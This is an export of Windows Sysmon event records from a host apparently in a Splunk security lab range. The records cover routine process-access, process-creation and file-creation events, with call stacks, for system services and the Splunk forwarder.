13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-93F9-6005-F204-00000000A301}42963788C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.992{59A5CD1D-93F9-6005-F204-00000000A301}42961312C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.835{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.695{59A5CD1D-9418-6005-1905-00000000A301}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.601{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.601{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.538{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.538{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.179{59A5CD1D-9418-6005-1805-00000000A301}71447148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.179{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u31h3lyz.2v4.ps12021-01-18 13:58:48.179 10341000x800000000000000013403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 